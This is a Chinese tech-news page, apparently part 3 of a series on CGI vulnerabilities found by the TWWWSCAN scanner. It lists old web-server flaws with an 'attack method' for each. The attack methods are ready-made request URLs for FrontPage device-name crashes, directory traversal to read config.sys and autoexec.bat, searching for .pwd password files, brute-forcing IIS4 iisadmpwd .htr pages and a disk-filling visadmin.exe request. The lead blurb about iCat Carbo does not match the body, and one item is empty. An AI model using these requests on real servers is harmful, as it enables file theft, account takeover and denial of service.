科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道TWWWSCAN漏洞扫描器CGI漏洞攻击(3)

TWWWSCAN漏洞扫描器CGI漏洞攻击(3)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在。
  • 评论
  • 分享微博
  • 分享邮件

  http://www.example.com/_vti_bin/shtml.exe/com1.htm

  http://www.example.com/_vti_bin/shtml.exe/prn.htm

  http://www.example.com/_vti_bin/shtml.exe/aux.htm

  http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm

  http://www.example.com/_vti_bin/shtml.exe/com1.asp

  http://www.example.com/_vti_bin/shtml.exe/com1.

  ___________________________________________________________

  13.queryhit.htm

  如果queryhit.htm提出一个搜索页面,那么你便可以搜索和观看这些文件。

  攻击方法:

  访问http://www.victim.com/samples/search/queryhit.htm 如果是搜索页面,然后在查找文件对话框里输入以下字符串:[#filename=*.pwd],如果屏幕上出现一长串连接到以[.pwd]为扩展名的密码文件的话,那就是所需要的东东了。

  __________________________________________________________________

  14.Dotdotdot

  vqServer及SybasePowerDynamo网站服务器存在着一个老的攻击漏洞,此攻击是关于点点(..)的攻击,这是由于在WINDOW中允许连续的点被解释为级连的目录如'cd ...',解释为'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允许远程攻击者绕过WEB安全系统横贯到其他目录。

  攻击方法:

  假如CONFIG.SYS存在在根目录下,就能读文件。 http://example.com/...................../config.sys

  列出根目录。 http://example.com/../../../../../../

  ______________________________________________________________________

  15.advsearch.asp

  ___________________________________________________________________

  16. autoexec.bat

  现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来退出HTTP root目录,从而到达上层的目录树中.在URL中使用"../",攻击者们可以获得WEB SERVER有权读取的任何文件.

  攻击方法: http://127.0.0.1:8080/../../../autoexec.bat 这样将读取系统中的autoexec.bat文件

  这个漏洞的利用还取决于系统目录的结构而定.

  _________________________________________________________________

  17.achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr

  aexp4.htr aexp4b.htr anot.htr anot3.htr

  IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制在loopbackaddr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:

  c:\winnt\system32\inetsrv\iisadmpwd

  攻击方法:

  访问:http://example.com/iisadmpwd/*.htr的页面,并利用工具对其进行穷举。

  ________________________________________________________________

  18.visadmin.exe

  这个漏洞可以在服务器中一直产生临时文件知道服务器的硬盘慢了为止。任何人都可以远程的来完成。

  使用使用在cgi-bin中默认的 visadmin.exe (Visitor Administrator)

  攻击方法:

  提交以下请求: http://www.targets.com/cgi-bin/visadmin.exe?user=guest

  ________________________________________________________________

  19.no-such-file.pl

  这个漏洞会暴露其服务器上的路径,当你访问这个页面时会显示类似以下信息:

  CGI Error

  The specified CGI application misbehaved by not returning a complete set of

  HTTP headers. The headers it did return are:

  Can't open perlscript "C:\InetPub\scripts\no-such-file.pl": No such file or

  Directory

  从此我们可以知道这个页面的物理路径为C:\InetPub\scripts\no-such-file.pl

  攻击方法:

  访问http://www.targets.com/cgi-bin/scripts/no-such-file.pl

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章